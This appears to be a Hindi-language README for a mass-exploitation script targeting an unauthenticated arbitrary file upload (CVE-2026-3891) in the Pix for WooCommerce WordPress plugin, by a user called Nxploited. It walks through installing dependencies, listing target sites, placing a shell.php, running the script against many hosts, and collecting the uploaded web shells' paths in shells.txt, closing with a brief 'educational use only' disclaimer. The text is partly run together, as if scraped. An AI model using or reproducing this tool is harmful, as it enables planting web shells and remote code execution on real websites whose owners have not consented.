
Pix for WooCommerce <= 1.5.0 - अप्रमाणित मनमाना फ़ाइल अपलोड
Pix for WooCommerce <= 1.5.0 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
वर्डप्रेस के लिए Pix for WooCommerce प्लगइन बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड के प्रति संवेदनशील है, निम्न कारणों से:
lkn_pix_for_woocommerce_c6_save_settings फ़ंक्शन में, जो सभी संस्करणों 1.5.0 तक (सम्मिलित) में मौजूद है।
यह दूरस्थ बिना प्रमाणीकृत हमलावरों को मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जिससे रिमोट कोड एक्ज़ीक्यूशन (RCE) होता है।
CVE-2026-38919.8 (क्रिटिकल)CVE-2026-3891.py@Kxploitpip install requests rich
एक फ़ाइल बनाएँ:
list.txt
उदाहरण:
http://example.com
https://target.com
victim-site.com
यदि प्रोटोकॉल गायब है → स्क्रिप्ट स्वतः
http://जोड़ देती है
अपनी शेल फ़ाइल को उसी निर्देशिका में रखें:
shell.php
python3 CVE-2026-3891.py
स्क्रिप्ट पूछेगी:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
Nxploited